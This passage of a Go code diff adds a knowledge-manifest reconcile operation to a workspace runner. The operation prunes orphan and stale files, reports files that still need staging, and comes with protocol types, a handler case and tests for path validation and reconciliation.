+			slog.Warn("skipping invalid manifest entry", "rel_path", f.RelPath, "error", err)
+			continue
+		}
+		expected[f.RelPath] = f.Checksum
+	}
+
+	result := &protocol.ReconcileKnowledgeManifestResult{}
+	knowledgeRoot := filepath.Join(e.root, "knowledge")
+	sentinelPath := filepath.Join(e.root, sentinelName)
+
+	err := withSentinelLock(sentinelPath, func() error {
+		sentinel := readSentinel(sentinelPath)
+		// onDisk enumerates `knowledge/<scope>/<leaf>` paths actually present.
+		// We walk the tree (rather than trusting the sentinel) so a manual
+		// drop into the workspace — e.g. an operator copying a file in for
+		// debugging — also gets reconciled instead of lingering forever.
+		onDisk, err := walkKnowledgeTree(knowledgeRoot)
+		if err != nil {
+			return err
+		}
+
+		dirty := false
+		// onDiskSet lets us answer "is this manifest entry already cached?"
+		// in O(1) below without a second walk.
+		onDiskSet := make(map[string]struct{}, len(onDisk))
+		for _, relPath := range onDisk {
+			expectedSum, want := expected[relPath]
+			switch {
+			case !want:
+				// Orphan: not declared in the current manifest.
+				if rmErr := os.Remove(filepath.Join(e.root, relPath)); rmErr != nil && !os.IsNotExist(rmErr) {
+					slog.Warn("failed to prune orphan knowledge file", "rel_path", relPath, "error", rmErr)
+					continue
+				}
+				delete(sentinel, relPath)
+				result.Pruned = append(result.Pruned, relPath)
+				dirty = true
+			case sentinel[relPath] != expectedSum:
+				// Stale: sentinel disagrees with the manifest. Drop the file;
+				// it'll come back via NeedsStage so Safari refetches it from S3.
+				if rmErr := os.Remove(filepath.Join(e.root, relPath)); rmErr != nil && !os.IsNotExist(rmErr) {
+					slog.Warn("failed to prune stale knowledge file", "rel_path", relPath, "error", rmErr)
+					continue
+				}
+				delete(sentinel, relPath)
+				result.Pruned = append(result.Pruned, relPath)
+				result.StaleCount++
+				dirty = true
+			default:
+				result.KeptCount++
+				onDiskSet[relPath] = struct{}{}
+			}
+		}
+
+		// Anything in the manifest that isn't in onDiskSet is a cache miss
+		// the caller needs to fix — either it was just pruned for being stale
+		// or it was never staged in the first place. The list is what powers
+		// Safari's eager-stage step so the full pack lands on disk in one
+		// batch instead of waiting for the agent to read each file.
+		for relPath := range expected {
+			if _, ok := onDiskSet[relPath]; !ok {
+				result.NeedsStage = append(result.NeedsStage, relPath)
+			}
+		}
+
+		if dirty {
+			return writeSentinel(sentinelPath, sentinel)
+		}
+		return nil
+	})
+	if err != nil {
+		return nil, fmt.Errorf("reconcile manifest: %w", err)
+	}
+	return result, nil
+}
+
+// walkKnowledgeTree returns every leaf file under <knowledgeRoot>/<scope>/
+// as `knowledge/<scope>/<leaf>` rel-paths. Hidden files (the sentinel) and
+// anything failing validation are skipped; nested directories beneath a scope
+// are ignored because the layout forbids them.
+func walkKnowledgeTree(knowledgeRoot string) ([]string, error) {
+	entries, err := os.ReadDir(knowledgeRoot)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil, nil
+		}
+		return nil, fmt.Errorf("read knowledge root: %w", err)
+	}
+
+	var paths []string
+	for _, scope := range entries {
+		if !scope.IsDir() {
+			continue
+		}
+		scopeName := scope.Name()
+		if scopeName != "account" && !teamScopeRe.MatchString(scopeName) {
+			continue
+		}
+		leaves, err := os.ReadDir(filepath.Join(knowledgeRoot, scopeName))
+		if err != nil {
+			slog.Warn("failed to read scope directory", "scope", scopeName, "error", err)
+			continue
+		}
+		for _, leaf := range leaves {
+			if leaf.IsDir() {
+				continue
+			}
+			rel := "knowledge/" + scopeName + "/" + leaf.Name()
+			if err := validateKnowledgeRelPath(rel); err != nil {
+				continue
+			}
+			paths = append(paths, rel)
+		}
+	}
+	return paths, nil
+}
+
 // DeleteKnowledgeFiles removes the supplied files from the workspace root and
 // scrubs their entries from the sentinel.
 func (e *Environment) DeleteKnowledgeFiles(ctx context.Context, args *protocol.DeleteKnowledgeFilesArgs) (*protocol.DeleteKnowledgeFilesResult, error) {
diff --git a/environment/knowledge_test.go b/environment/knowledge_test.go
index 76202d7..e8384e7 100644
--- a/environment/knowledge_test.go
+++ b/environment/knowledge_test.go
@@ -42,21 +42,48 @@ func TestStageKnowledgeFiles_Single(t *testing.T) {
 
 	result, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
 		Files: []protocol.KnowledgeFile{
-			{RelPath: "DUTY.md", Checksum: "abc123", ContentB64: b64("# Duty\n")},
+			{RelPath: "knowledge/account/DUTY.md", Checksum: "abc123", ContentB64: b64("# Duty\n")},
 		},
 	})
 	require.NoError(t, err)
 	require.Len(t, result.Files, 1)
-	assert.True(t, result.Files[0].Success)
+	assert.True(t, result.Files[0].Success, "stage failed: %s", result.Files[0].Error)
 	assert.Empty(t, result.Files[0].Error)
 
-	assert.Equal(t, "# Duty\n", fileContent(t, ws.Root(), "DUTY.md"))
+	assert.Equal(t, "# Duty\n", fileContent(t, ws.Root(), "knowledge/account/DUTY.md"))
+
+	sentinel := readSentinelMap(t, ws.Root())
+	assert.Equal(t, "abc123", sentinel["knowledge/account/DUTY.md"])
+}
+
+// Stage files for two scopes in one call → both directories materialise and
+// the sentinel records both keys. Locks in the multi-scope contract that
+// motivated relaxing validateKnowledgeRelPath in the first place.
+func TestStageKnowledgeFiles_AccountAndTeam(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	result, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
+		Files: []protocol.KnowledgeFile{
+			{RelPath: "knowledge/account/DUTY.md", Checksum: "asum", ContentB64: b64("a")},
+			{RelPath: "knowledge/team_42/escalation.md", Checksum: "tsum", ContentB64: b64("t")},
+		},
+	})
+	require.NoError(t, err)
+	require.Len(t, result.Files, 2)
+	for i, st := range result.Files {
+		assert.True(t, st.Success, "file %d (%s) failed: %s", i, st.RelPath, st.Error)
+	}
+
+	assert.Equal(t, "a", fileContent(t, ws.Root(), "knowledge/account/DUTY.md"))
+	assert.Equal(t, "t", fileContent(t, ws.Root(), "knowledge/team_42/escalation.md"))
 
 	sentinel := readSentinelMap(t, ws.Root())
-	assert.Equal(t, "abc123", sentinel["DUTY.md"])
+	assert.Equal(t, "asum", sentinel["knowledge/account/DUTY.md"])
+	assert.Equal(t, "tsum", sentinel["knowledge/team_42/escalation.md"])
 }
 
-// Case 2: mixed batch — one valid file + one with '/' in rel_path.
+// Case 2: mixed batch — one valid file + one with an extra '/' segment.
 // The valid file must land; the invalid one must return an error in the ack;
 // the sentinel must contain only the valid entry.
 func TestStageKnowledgeFiles_MixedValidity(t *testing.T) {
@@ -65,8 +92,8 @@ func TestStageKnowledgeFiles_MixedValidity(t *testing.T) {
 
 	result, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
 		Files: []protocol.KnowledgeFile{
-			{RelPath: "DUTY.md", Checksum: "goodsum", ContentB64: b64("content")},
-			{RelPath: "sub/evil.md", Checksum: "badsum", ContentB64: b64("evil")},
+			{RelPath: "knowledge/account/DUTY.md", Checksum: "goodsum", ContentB64: b64("content")},
+			{RelPath: "knowledge/account/sub/evil.md", Checksum: "badsum", ContentB64: b64("evil")},
 		},
 	})
 	require.NoError(t, err)
@@ -76,18 +103,18 @@ func TestStageKnowledgeFiles_MixedValidity(t *testing.T) {
 	assert.True(t, result.Files[0].Success)
 	assert.Empty(t, result.Files[0].Error)
 
-	// Second entry (slash in path) should fail.
+	// Second entry (deeper than knowledge/<scope>/<leaf>) should fail.
 	assert.False(t, result.Files[1].Success)
 	assert.NotEmpty(t, result.Files[1].Error)
 
 	// Only valid file exists on disk.
-	assert.FileExists(t, filepath.Join(ws.Root(), "DUTY.md"))
-	assert.NoFileExists(t, filepath.Join(ws.Root(), "sub/evil.md"))
+	assert.FileExists(t, filepath.Join(ws.Root(), "knowledge/account/DUTY.md"))
+	assert.NoFileExists(t, filepath.Join(ws.Root(), "knowledge/account/sub/evil.md"))
 
 	// Sentinel has only the good entry.
 	sentinel := readSentinelMap(t, ws.Root())
-	assert.Equal(t, "goodsum", sentinel["DUTY.md"])
-	_, hasBad := sentinel["sub/evil.md"]
+	assert.Equal(t, "goodsum", sentinel["knowledge/account/DUTY.md"])
+	_, hasBad := sentinel["knowledge/account/sub/evil.md"]
 	assert.False(t, hasBad)
 }
 
@@ -99,22 +126,22 @@ func TestStageKnowledgeFiles_Overwrite(t *testing.T) {
 
 	_, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
 		Files: []protocol.KnowledgeFile{
-			{RelPath: "runbook.md", Checksum: "v1sum", ContentB64: b64("version 1")},
+			{RelPath: "knowledge/account/runbook.md", Checksum: "v1sum", ContentB64: b64("version 1")},
 		},
 	})
 	require.NoError(t, err)
 
 	_, err = ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
 		Files: []protocol.KnowledgeFile{
-			{RelPath: "runbook.md", Checksum: "v2sum", ContentB64: b64("version 2")},
+			{RelPath: "knowledge/account/runbook.md", Checksum: "v2sum", ContentB64: b64("version 2")},
 		},
 	})
 	require.NoError(t, err)
 
-	assert.Equal(t, "version 2", fileContent(t, ws.Root(), "runbook.md"))
+	assert.Equal(t, "version 2", fileContent(t, ws.Root(), "knowledge/account/runbook.md"))
 
 	sentinel := readSentinelMap(t, ws.Root())
-	assert.Equal(t, "v2sum", sentinel["runbook.md"])
+	assert.Equal(t, "v2sum", sentinel["knowledge/account/runbook.md"])
 }
 
 // Case 4: delete a previously staged file → file gone, sentinel entry gone.
@@ -125,22 +152,22 @@ func TestDeleteKnowledgeFiles_Staged(t *testing.T) {
 	// Stage first.
 	_, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
 		Files: []protocol.KnowledgeFile{
-			{RelPath: "old-runbook.md", Checksum: "deadbeef", ContentB64: b64("old content")},
+			{RelPath: "knowledge/account/old-runbook.md", Checksum: "deadbeef", ContentB64: b64("old content")},
 		},
 	})
 	require.NoError(t, err)
 
 	// Delete.
 	delResult, err := ws.DeleteKnowledgeFiles(ctx, &protocol.DeleteKnowledgeFilesArgs{
-		RelPaths: []string{"old-runbook.md"},
+		RelPaths: []string{"knowledge/account/old-runbook.md"},
 	})
 	require.NoError(t, err)
 	assert.True(t, delResult.Success)
 
-	assert.NoFileExists(t, filepath.Join(ws.Root(), "old-runbook.md"))
+	assert.NoFileExists(t, filepath.Join(ws.Root(), "knowledge/account/old-runbook.md"))
 
 	sentinel := readSentinelMap(t, ws.Root())
-	_, exists := sentinel["old-runbook.md"]
+	_, exists := sentinel["knowledge/account/old-runbook.md"]
 	assert.False(t, exists)
 }
 
@@ -150,7 +177,7 @@ func TestDeleteKnowledgeFiles_Missing(t *testing.T) {
 	ctx := context.Background()
 
 	result, err := ws.DeleteKnowledgeFiles(ctx, &protocol.DeleteKnowledgeFilesArgs{
-		RelPaths: []string{"does-not-exist.md"},
+		RelPaths: []string{"knowledge/account/does-not-exist.md"},
 	})
 	require.NoError(t, err)
 	assert.True(t, result.Success)
@@ -165,18 +192,18 @@ func TestStageDeleteCycle(t *testing.T) {
 	for i := range 2 {
 		_, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
 			Files: []protocol.KnowledgeFile{
-				{RelPath: "cycle.md", Checksum: "cycle", ContentB64: b64("cycle")},
+				{RelPath: "knowledge/account/cycle.md", Checksum: "cycle", ContentB64: b64("cycle")},
 			},
 		})
 		require.NoError(t, err, "stage iteration %d", i)
 
 		_, err = ws.DeleteKnowledgeFiles(ctx, &protocol.DeleteKnowledgeFilesArgs{
-			RelPaths: []string{"cycle.md"},
+			RelPaths: []string{"knowledge/account/cycle.md"},
 		})
 		require.NoError(t, err, "delete iteration %d", i)
 	}
 
-	assert.NoFileExists(t, filepath.Join(ws.Root(), "cycle.md"))
+	assert.NoFileExists(t, filepath.Join(ws.Root(), "knowledge/account/cycle.md"))
 
 	sentinel := readSentinelMap(t, ws.Root())
 	assert.Empty(t, sentinel)
@@ -192,9 +219,15 @@ func TestStageKnowledgeFiles_RejectedPaths(t *testing.T) {
 		desc    string
 	}{
 		{"../etc/passwd", "path traversal with .."},
-		{"sub/x.md", "subdirectory path with /"},
-		{".hidden.md", "leading-dot filename"},
-		{sentinelName, "sentinel filename itself"},
+		{"knowledge/account/sub/x.md", "deeper than knowledge/<scope>/<leaf>"},
+		{"knowledge/account/.hidden.md", "leading-dot leaf"},
+		{"knowledge/account/" + sentinelName, "sentinel filename leaf"},
+		{"account/DUTY.md", "missing knowledge/ prefix"},
+		{"DUTY.md", "bare leaf without scope"},
+		{"knowledge/unknown_scope/x.md", "unknown scope segment"},
+		{"knowledge/team_/x.md", "empty team id"},
+		{"knowledge/team_42a/x.md", "non-digit team suffix"},
+		{"skill/account/x.md", "wrong root segment"},
 		{"", "empty string"},
 	}
 
@@ -217,22 +250,217 @@ func TestStageKnowledgeFiles_RejectedPaths(t *testing.T) {
 // thorough coverage of edge cases.
 func TestValidateKnowledgeRelPath(t *testing.T) {
 	valid := []string{
-		"DUTY.md", "runbook-api.md", "README.txt", "a",
+		"knowledge/account/DUTY.md", "knowledge/account/runbook-api.md",
+		"knowledge/account/README.txt", "knowledge/account/a",
+		"knowledge/team_1/x.md", "knowledge/team_42/escalation.md", "knowledge/team_999/foo.md",
+		// Double-dot in the middle of a filename is a legal flat name.
+		"knowledge/account/foo..bar", "knowledge/account/v2..md",
 	}
 	for _, p := range valid {
 		assert.NoError(t, validateKnowledgeRelPath(p), "should be valid: %q", p)
 	}
 
 	invalid := []string{
-		"", "..", "a/b", `a\b`, ".hidden", sentinelName, "foo/../bar",
-		// These are now valid because ".." only matches the bare token, not
-		// substrings — "foo..bar" is a legitimate flat filename.
-	}
-	validButPreviouslyRejected := []string{"foo..bar", "v2..md"}
-	for _, p := range validButPreviouslyRejected {
-		assert.NoError(t, validateKnowledgeRelPath(p), "should be valid (double-dot in middle): %q", p)
+		"", "..", "DUTY.md", "a", "account/x.md", `knowledge\account\x.md`,
+		"knowledge/account/", "knowledge/account/.hidden",
+		"knowledge/account/" + sentinelName,
+		"knowledge/account/sub/x.md",
+		"knowledge/account/../etc/passwd", "knowledge/account/..",
+		"knowledge/foo/x.md", "knowledge/team_/x.md",
+		"knowledge/team_42a/x.md", "knowledge/Team_42/x.md",
+		"skill/account/x.md", "knowledge", "knowledge/", "knowledge/account",
 	}
 	for _, p := range invalid {
 		assert.Error(t, validateKnowledgeRelPath(p), "should be invalid: %q", p)
 	}
 }
+
+// stageOne is a tiny helper that lands a single file into the test workspace
+// so reconcile tests can set up scenarios without restating the boilerplate.
+func stageOne(t *testing.T, ws *Environment, relPath, sum, body string) {
+	t.Helper()
+	res, err := ws.StageKnowledgeFiles(context.Background(), &protocol.StageKnowledgeFilesArgs{
+		Files: []protocol.KnowledgeFile{{RelPath: relPath, Checksum: sum, ContentB64: b64(body)}},
+	})
+	require.NoError(t, err)
+	require.Len(t, res.Files, 1)
+	require.True(t, res.Files[0].Success, res.Files[0].Error)
+}
+
+// Reconcile case 1: every staged file matches the manifest → no prune,
+// kept_count == staged count, sentinel untouched, nothing needs staging.
+func TestReconcileKnowledgeManifest_AllMatch(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	stageOne(t, ws, "knowledge/account/runbook.md", "sum-a", "A")
+	stageOne(t, ws, "knowledge/team_42/escalation.md", "sum-b", "B")
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{
+		Files: []protocol.KnowledgeManifestEntry{
+			{RelPath: "knowledge/account/runbook.md", Checksum: "sum-a"},
+			{RelPath: "knowledge/team_42/escalation.md", Checksum: "sum-b"},
+		},
+	})
+	require.NoError(t, err)
+	assert.Empty(t, res.Pruned)
+	assert.Equal(t, 2, res.KeptCount)
+	assert.Equal(t, 0, res.StaleCount)
+	assert.Empty(t, res.NeedsStage, "everything matches; caller should not need to stage anything")
+
+	// Files still on disk; sentinel still has both entries.
+	assert.Equal(t, "A", fileContent(t, ws.Root(), "knowledge/account/runbook.md"))
+	assert.Equal(t, "B", fileContent(t, ws.Root(), "knowledge/team_42/escalation.md"))
+	sentinel := readSentinelMap(t, ws.Root())
+	assert.Equal(t, "sum-a", sentinel["knowledge/account/runbook.md"])
+	assert.Equal(t, "sum-b", sentinel["knowledge/team_42/escalation.md"])
+}
+
+// Reconcile case 2: a staged file is missing from the manifest entirely (the
+// pack-level deletion case). The runner deletes the file and drops it from
+// the sentinel; the surviving file is left alone.
+func TestReconcileKnowledgeManifest_PrunesOrphans(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	stageOne(t, ws, "knowledge/account/runbook.md", "sum-a", "A")
+	stageOne(t, ws, "knowledge/account/old.md", "sum-old", "old body")
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{
+		Files: []protocol.KnowledgeManifestEntry{
+			{RelPath: "knowledge/account/runbook.md", Checksum: "sum-a"},
+		},
+	})
+	require.NoError(t, err)
+	assert.ElementsMatch(t, []string{"knowledge/account/old.md"}, res.Pruned)
+	assert.Equal(t, 1, res.KeptCount)
+	assert.Equal(t, 0, res.StaleCount, "orphan should not count as stale")
+	assert.Empty(t, res.NeedsStage, "the surviving file is current and the orphan is not in the manifest")
+
+	_, err = os.Stat(filepath.Join(ws.Root(), "knowledge/account/old.md"))
+	assert.True(t, os.IsNotExist(err), "orphan should be deleted")
+	assert.Equal(t, "A", fileContent(t, ws.Root(), "knowledge/account/runbook.md"))
+
+	sentinel := readSentinelMap(t, ws.Root())
+	_, hasOld := sentinel["knowledge/account/old.md"]
+	assert.False(t, hasOld, "sentinel must not retain pruned entry")
+	assert.Equal(t, "sum-a", sentinel["knowledge/account/runbook.md"])
+}
+
+// Reconcile case 3: a file's checksum drifted upstream (someone edited it in
+// the UI). The runner deletes the on-disk copy so the next read goes through
+// Safari's lazy installer and gets the fresh bytes from S3.
+func TestReconcileKnowledgeManifest_PrunesStaleChecksum(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	stageOne(t, ws, "knowledge/account/runbook.md", "sum-old", "old content")
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{
+		Files: []protocol.KnowledgeManifestEntry{
+			{RelPath: "knowledge/account/runbook.md", Checksum: "sum-new"},
+		},
+	})
+	require.NoError(t, err)
+	assert.ElementsMatch(t, []string{"knowledge/account/runbook.md"}, res.Pruned)
+	assert.Equal(t, 0, res.KeptCount)
+	assert.Equal(t, 1, res.StaleCount, "checksum drift should count as stale")
+	assert.ElementsMatch(t, []string{"knowledge/account/runbook.md"}, res.NeedsStage,
+		"after pruning the stale copy, caller must restage the fresh bytes")
+
+	_, err = os.Stat(filepath.Join(ws.Root(), "knowledge/account/runbook.md"))
+	assert.True(t, os.IsNotExist(err), "stale file should be deleted")
+
+	sentinel := readSentinelMap(t, ws.Root())
+	_, hasEntry := sentinel["knowledge/account/runbook.md"]
+	assert.False(t, hasEntry, "sentinel must drop the stale entry so a refetch resets it")
+}
+
+// Reconcile case 4: an empty manifest is the "no packs are active anymore"
+// signal — every staged file should be pruned.
+func TestReconcileKnowledgeManifest_EmptyManifestPrunesEverything(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	stageOne(t, ws, "knowledge/account/a.md", "sa", "a")
+	stageOne(t, ws, "knowledge/team_5/b.md", "sb", "b")
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{Files: nil})
+	require.NoError(t, err)
+	assert.ElementsMatch(t, []string{"knowledge/account/a.md", "knowledge/team_5/b.md"}, res.Pruned)
+	assert.Equal(t, 0, res.KeptCount)
+
+	sentinel := readSentinelMap(t, ws.Root())
+	assert.Empty(t, sentinel)
+}
+
+// Reconcile case 5: an operator drop — a file appeared on disk that Safari
+// never staged (so it has no sentinel entry). It must be pruned because it
+// isn't in the manifest, even though there's no checksum to compare against.
+func TestReconcileKnowledgeManifest_PrunesUnsentineledFile(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	// Drop a file directly on disk, bypassing StageKnowledgeFiles → no sentinel.
+	scopeDir := filepath.Join(ws.Root(), "knowledge", "account")
+	require.NoError(t, os.MkdirAll(scopeDir, 0o755))
+	require.NoError(t, os.WriteFile(filepath.Join(scopeDir, "manual.md"), []byte("hand-placed"), 0o644))
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{Files: nil})
+	require.NoError(t, err)
+	assert.ElementsMatch(t, []string{"knowledge/account/manual.md"}, res.Pruned)
+
+	_, err = os.Stat(filepath.Join(scopeDir, "manual.md"))
+	assert.True(t, os.IsNotExist(err))
+}
+
+// Reconcile case 6a: cold runner — manifest declares files that aren't on
+// disk yet. Nothing to prune, but every entry comes back in NeedsStage so
+// Safari can do a one-shot eager fetch+stage at session start.
+func TestReconcileKnowledgeManifest_FlagsMissingForEagerStage(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{
+		Files: []protocol.KnowledgeManifestEntry{
+			{RelPath: "knowledge/account/DUTY.md", Checksum: "duty"},
+			{RelPath: "knowledge/account/runbook.md", Checksum: "rb"},
+		},
+	})
+	require.NoError(t, err)
+	assert.Empty(t, res.Pruned)
+	assert.Equal(t, 0, res.KeptCount)
+	assert.ElementsMatch(t,
+		[]string{"knowledge/account/DUTY.md", "knowledge/account/runbook.md"},
+		res.NeedsStage,
+	)
+}
+
+// Reconcile case 6: the sentinel filename and unrecognized scope dirs must be
+// invisible to the walker — no spurious "prune" attempts on infra files.
+func TestReconcileKnowledgeManifest_IgnoresSentinelAndUnknownDirs(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	stageOne(t, ws, "knowledge/account/keep.md", "sk", "keep")
+
+	// Plant an unknown-scope directory and an arbitrary file in the knowledge
+	// root; neither should appear in the prune list.
+	rogueScope := filepath.Join(ws.Root(), "knowledge", "rogue_scope")
+	require.NoError(t, os.MkdirAll(rogueScope, 0o755))
+	require.NoError(t, os.WriteFile(filepath.Join(rogueScope, "stuff.md"), []byte("x"), 0o644))
+
+	res, err := ws.ReconcileKnowledgeManifest(ctx, &protocol.ReconcileKnowledgeManifestArgs{
+		Files: []protocol.KnowledgeManifestEntry{
+			{RelPath: "knowledge/account/keep.md", Checksum: "sk"},
+		},
+	})
+	require.NoError(t, err)
+	assert.Empty(t, res.Pruned, "unknown scope dirs and the sentinel must not be touched")
+	assert.Equal(t, 1, res.KeptCount)
+
+	// Rogue file is still there — reconcile is intentionally narrow, only the
+	// validated scope dirs (`account`, `team_<digits>`) are in scope.
+	_, err = os.Stat(filepath.Join(rogueScope, "stuff.md"))
+	assert.NoError(t, err)
+}
diff --git a/protocol/messages.go b/protocol/messages.go
index f7db45b..30f3dd4 100644
--- a/protocol/messages.go
+++ b/protocol/messages.go
@@ -115,8 +115,9 @@ const (
 	TaskOpMCPCall              TaskOperation = "mcp_call"
 	TaskOpMCPListTools         TaskOperation = "mcp_list_tools"
 	TaskOpSyncSkill            TaskOperation = "sync_skill"
-	TaskOpStageKnowledgeFiles  TaskOperation = "stage_knowledge_files"
-	TaskOpDeleteKnowledgeFiles TaskOperation = "delete_knowledge_files"
+	TaskOpStageKnowledgeFiles         TaskOperation = "stage_knowledge_files"
+	TaskOpDeleteKnowledgeFiles        TaskOperation = "delete_knowledge_files"
+	TaskOpReconcileKnowledgeManifest  TaskOperation = "reconcile_knowledge_manifest"
 )
 
 // TaskRequestPayload is the payload for task request messages.
@@ -408,3 +409,39 @@ type DeleteKnowledgeFilesArgs struct {
 type DeleteKnowledgeFilesResult struct {
 	Success bool `json:"success"`
 }
+
+// KnowledgeManifestEntry is one (rel_path, checksum) pair in a reconcile manifest.
+// rel_path uses the same `knowledge/<scope>/<leaf>` shape as StageKnowledgeFiles
+// so the runner-side validator is shared.
+type KnowledgeManifestEntry struct {
+	RelPath  string `json:"rel_path"`
+	Checksum string `json:"checksum"`
+}
+
+// ReconcileKnowledgeManifestArgs supplies the canonical view of which knowledge
+// files should exist on disk and at what checksum. The runner deletes anything
+// not in the manifest (orphan prune) and anything whose on-disk checksum
+// disagrees (stale prune); the result's NeedsStage field tells the caller
+// which manifest entries the runner does NOT have cached so the caller can
+// bulk-stage them in one follow-up batch (skills-style eager materialization).
+type ReconcileKnowledgeManifestArgs struct {
+	Files []KnowledgeManifestEntry `json:"files"`
+}
+
+// ReconcileKnowledgeManifestResult reports the diff outcome plus the list of
+// entries the caller still needs to push.
+//
+// Pruned lists every rel_path the runner removed (orphans + stale together).
+// StaleCount is the subset of Pruned whose rel_path was in the manifest but
+// had a divergent checksum — useful for spotting upstream edits.
+// KeptCount counts files left untouched because their checksum already matched.
+// NeedsStage enumerates every manifest entry the runner does NOT have on disk
+// after the prune step. The caller (Safari) materializes these by fetching
+// from S3 and calling StageKnowledgeFiles. Empty when the runner is already
+// in sync with the manifest.
+type ReconcileKnowledgeManifestResult struct {
+	Pruned     []string `json:"pruned,omitempty"`
+	KeptCount  int      `json:"kept_count"`
+	StaleCount int      `json:"stale_count"`
+	NeedsStage []string `json:"needs_stage,omitempty"`
+}
diff --git a/ws/handler.go b/ws/handler.go
index 1ac69eb..1452d79 100644
--- a/ws/handler.go
+++ b/ws/handler.go
@@ -270,6 +270,14 @@ func (h *Handler) executeTask(ctx context.Context, req *protocol.TaskRequestPayl
 		logger.Info("deleting knowledge files", "count", len(args.RelPaths))
 		return h.ws.DeleteKnowledgeFiles(ctx, args)
 
+	case protocol.TaskOpReconcileKnowledgeManifest:
+		args, err := parseArgs[protocol.ReconcileKnowledgeManifestArgs](req.Args)
+		if err != nil {
+			return nil, fmt.Errorf("invalid reconcile_knowledge_manifest args: %w", err)
+		}
+		logger.Info("reconciling knowledge manifest", "count", len(args.Files))
+		return h.ws.ReconcileKnowledgeManifest(ctx, args)
+
 	default:
 		return nil, fmt.Errorf("unknown operation: %s", req.Operation)
 	}